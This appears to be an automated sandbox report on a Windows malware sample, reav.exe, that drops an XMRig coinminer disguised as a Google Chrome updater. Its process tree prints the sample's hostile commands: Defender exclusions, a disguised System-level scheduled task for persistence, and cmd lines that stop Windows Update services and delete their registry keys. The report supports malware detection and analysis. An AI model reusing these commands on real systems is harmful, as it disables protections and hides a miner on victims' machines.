Analysis
-
max time kernel
300s -
max time network
297s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
23-09-2022 06:18
Behavioral task
behavioral1
Sample
reav.exe
Resource
win7-20220812-en
General
-
Target
reav.exe
-
Size
7.0MB
-
MD5
4c7bc4f742346f6f5506660175637a70
-
SHA1
b1c87e4395474abb15a1c6bf785bee77adfaefa5
-
SHA256
0423d0cb6564b1b11ac919f5c8d4de4d6cda4a694cdb9f62d2d44b6009bc506d
-
SHA512
fdb83490b218672b0ebf32d2e9168d89865efe0373468974d05ed3fe1ac1a22c986f0e75a746da4002db280d03376179805e92b2c2a8700a90c85238231a6b29
-
SSDEEP
196608:SIcrtGJOI5qLOKdTn8a9tcpAbe+wOlWd1wUgETPCO67:SIchGlepn8+Ag6wUhPx67
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
reav.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ reav.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4596-226-0x00007FF686C10000-0x00007FF687404000-memory.dmp xmrig behavioral2/memory/4596-229-0x00007FF686C10000-0x00007FF687404000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
updater.exereav.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts updater.exe File created C:\Windows\system32\drivers\etc\hosts reav.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 3760 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/4596-226-0x00007FF686C10000-0x00007FF687404000-memory.dmp upx behavioral2/memory/4596-229-0x00007FF686C10000-0x00007FF687404000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
updater.exereav.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion reav.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion reav.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe -
Processes:
resource yara_rule behavioral2/memory/4024-133-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp themida behavioral2/memory/4024-134-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp themida behavioral2/memory/4024-136-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp themida behavioral2/memory/4024-137-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp themida behavioral2/memory/4024-138-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp themida behavioral2/memory/4024-139-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp themida behavioral2/memory/4024-140-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp themida behavioral2/memory/4024-167-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/3760-173-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp themida behavioral2/memory/3760-175-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp themida behavioral2/memory/3760-177-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp themida behavioral2/memory/3760-178-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp themida behavioral2/memory/3760-179-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp themida behavioral2/memory/3760-180-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp themida behavioral2/memory/3760-181-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/3760-227-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp themida -
Processes:
reav.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA reav.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
reav.exeupdater.exepid process 4024 reav.exe 3760 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 3760 set thread context of 4592 3760 updater.exe conhost.exe PID 3760 set thread context of 4596 3760 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.execmd.exereav.exeupdater.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe reav.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4200 sc.exe 2552 sc.exe 4876 sc.exe 4656 sc.exe 536 sc.exe 2676 sc.exe 4652 sc.exe 5076 sc.exe 2520 sc.exe 4084 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 3716 powershell.exe 3716 powershell.exe 1172 powershell.exe 1172 powershell.exe 1332 powershell.exe 1332 powershell.exe 2124 powershell.exe 2124 powershell.exe 4052 powershell.exe 4052 powershell.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe 4596 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 3716 powershell.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeShutdownPrivilege 5028 powercfg.exe Token: SeCreatePagefilePrivilege 5028 powercfg.exe Token: SeShutdownPrivilege 4116 powercfg.exe Token: SeCreatePagefilePrivilege 4116 powercfg.exe Token: SeShutdownPrivilege 920 powercfg.exe Token: SeCreatePagefilePrivilege 920 powercfg.exe Token: SeShutdownPrivilege 2732 powercfg.exe Token: SeCreatePagefilePrivilege 2732 powercfg.exe Token: SeIncreaseQuotaPrivilege 1172 powershell.exe Token: SeSecurityPrivilege 1172 powershell.exe Token: SeTakeOwnershipPrivilege 1172 powershell.exe Token: SeLoadDriverPrivilege 1172 powershell.exe Token: SeSystemProfilePrivilege 1172 powershell.exe Token: SeSystemtimePrivilege 1172 powershell.exe Token: SeProfSingleProcessPrivilege 1172 powershell.exe Token: SeIncBasePriorityPrivilege 1172 powershell.exe Token: SeCreatePagefilePrivilege 1172 powershell.exe Token: SeBackupPrivilege 1172 powershell.exe Token: SeRestorePrivilege 1172 powershell.exe Token: SeShutdownPrivilege 1172 powershell.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeSystemEnvironmentPrivilege 1172 powershell.exe Token: SeRemoteShutdownPrivilege 1172 powershell.exe Token: SeUndockPrivilege 1172 powershell.exe Token: SeManageVolumePrivilege 1172 powershell.exe Token: 33 1172 powershell.exe Token: 34 1172 powershell.exe Token: 35 1172 powershell.exe Token: 36 1172 powershell.exe Token: SeIncreaseQuotaPrivilege 1172 powershell.exe Token: SeSecurityPrivilege 1172 powershell.exe Token: SeTakeOwnershipPrivilege 1172 powershell.exe Token: SeLoadDriverPrivilege 1172 powershell.exe Token: SeSystemProfilePrivilege 1172 powershell.exe Token: SeSystemtimePrivilege 1172 powershell.exe Token: SeProfSingleProcessPrivilege 1172 powershell.exe Token: SeIncBasePriorityPrivilege 1172 powershell.exe Token: SeCreatePagefilePrivilege 1172 powershell.exe Token: SeBackupPrivilege 1172 powershell.exe Token: SeRestorePrivilege 1172 powershell.exe Token: SeShutdownPrivilege 1172 powershell.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeSystemEnvironmentPrivilege 1172 powershell.exe Token: SeRemoteShutdownPrivilege 1172 powershell.exe Token: SeUndockPrivilege 1172 powershell.exe Token: SeManageVolumePrivilege 1172 powershell.exe Token: 33 1172 powershell.exe Token: 34 1172 powershell.exe Token: 35 1172 powershell.exe Token: 36 1172 powershell.exe Token: SeIncreaseQuotaPrivilege 1172 powershell.exe Token: SeSecurityPrivilege 1172 powershell.exe Token: SeTakeOwnershipPrivilege 1172 powershell.exe Token: SeLoadDriverPrivilege 1172 powershell.exe Token: SeSystemProfilePrivilege 1172 powershell.exe Token: SeSystemtimePrivilege 1172 powershell.exe Token: SeProfSingleProcessPrivilege 1172 powershell.exe Token: SeIncBasePriorityPrivilege 1172 powershell.exe Token: SeCreatePagefilePrivilege 1172 powershell.exe Token: SeBackupPrivilege 1172 powershell.exe Token: SeRestorePrivilege 1172 powershell.exe Token: SeShutdownPrivilege 1172 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
reav.execmd.execmd.exepowershell.exeupdater.execmd.execmd.exedescription pid process target process PID 4024 wrote to memory of 3716 4024 reav.exe powershell.exe PID 4024 wrote to memory of 3716 4024 reav.exe powershell.exe PID 4024 wrote to memory of 3168 4024 reav.exe cmd.exe PID 4024 wrote to memory of 3168 4024 reav.exe cmd.exe PID 4024 wrote to memory of 2784 4024 reav.exe cmd.exe PID 4024 wrote to memory of 2784 4024 reav.exe cmd.exe PID 4024 wrote to memory of 1172 4024 reav.exe powershell.exe PID 4024 wrote to memory of 1172 4024 reav.exe powershell.exe PID 3168 wrote to memory of 4652 3168 cmd.exe sc.exe PID 3168 wrote to memory of 4652 3168 cmd.exe sc.exe PID 2784 wrote to memory of 5028 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 5028 2784 cmd.exe powercfg.exe PID 3168 wrote to memory of 4200 3168 cmd.exe sc.exe PID 3168 wrote to memory of 4200 3168 cmd.exe sc.exe PID 2784 wrote to memory of 4116 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 4116 2784 cmd.exe powercfg.exe PID 3168 wrote to memory of 2552 3168 cmd.exe sc.exe PID 3168 wrote to memory of 2552 3168 cmd.exe sc.exe PID 3168 wrote to memory of 5076 3168 cmd.exe sc.exe PID 3168 wrote to memory of 5076 3168 cmd.exe sc.exe PID 2784 wrote to memory of 920 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 920 2784 cmd.exe powercfg.exe PID 3168 wrote to memory of 4876 3168 cmd.exe sc.exe PID 3168 wrote to memory of 4876 3168 cmd.exe sc.exe PID 2784 wrote to memory of 2732 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 2732 2784 cmd.exe powercfg.exe PID 3168 wrote to memory of 816 3168 cmd.exe reg.exe PID 3168 wrote to memory of 816 3168 cmd.exe reg.exe PID 3168 wrote to memory of 448 3168 cmd.exe reg.exe PID 3168 wrote to memory of 448 3168 cmd.exe reg.exe PID 3168 wrote to memory of 4716 3168 cmd.exe reg.exe PID 3168 wrote to memory of 4716 3168 cmd.exe reg.exe PID 3168 wrote to memory of 2464 3168 cmd.exe reg.exe PID 3168 wrote to memory of 2464 3168 cmd.exe reg.exe PID 3168 wrote to memory of 4552 3168 cmd.exe reg.exe PID 3168 wrote to memory of 4552 3168 cmd.exe reg.exe PID 4024 wrote to memory of 1332 4024 reav.exe powershell.exe PID 4024 wrote to memory of 1332 4024 reav.exe powershell.exe PID 1332 wrote to memory of 1548 1332 powershell.exe schtasks.exe PID 1332 wrote to memory of 1548 1332 powershell.exe schtasks.exe PID 3760 wrote to memory of 2124 3760 updater.exe powershell.exe PID 3760 wrote to memory of 2124 3760 updater.exe powershell.exe PID 3760 wrote to memory of 5040 3760 updater.exe cmd.exe PID 3760 wrote to memory of 5040 3760 updater.exe cmd.exe PID 3760 wrote to memory of 3152 3760 updater.exe cmd.exe PID 3760 wrote to memory of 3152 3760 updater.exe cmd.exe PID 3760 wrote to memory of 4052 3760 updater.exe powershell.exe PID 3760 wrote to memory of 4052 3760 updater.exe powershell.exe PID 5040 wrote to memory of 2520 5040 cmd.exe sc.exe PID 5040 wrote to memory of 2520 5040 cmd.exe sc.exe PID 3152 wrote to memory of 4528 3152 cmd.exe powercfg.exe PID 3152 wrote to memory of 4528 3152 cmd.exe powercfg.exe PID 5040 wrote to memory of 4656 5040 cmd.exe sc.exe PID 5040 wrote to memory of 4656 5040 cmd.exe sc.exe PID 3152 wrote to memory of 2232 3152 cmd.exe powercfg.exe PID 3152 wrote to memory of 2232 3152 cmd.exe powercfg.exe PID 5040 wrote to memory of 536 5040 cmd.exe sc.exe PID 5040 wrote to memory of 536 5040 cmd.exe sc.exe PID 3152 wrote to memory of 3944 3152 cmd.exe powercfg.exe PID 3152 wrote to memory of 3944 3152 cmd.exe powercfg.exe PID 5040 wrote to memory of 2676 5040 cmd.exe sc.exe PID 5040 wrote to memory of 2676 5040 cmd.exe sc.exe PID 3152 wrote to memory of 4420 3152 cmd.exe powercfg.exe PID 3152 wrote to memory of 4420 3152 cmd.exe powercfg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\reav.exe"C:\Users\Admin\AppData\Local\Temp\reav.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#mlvtn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
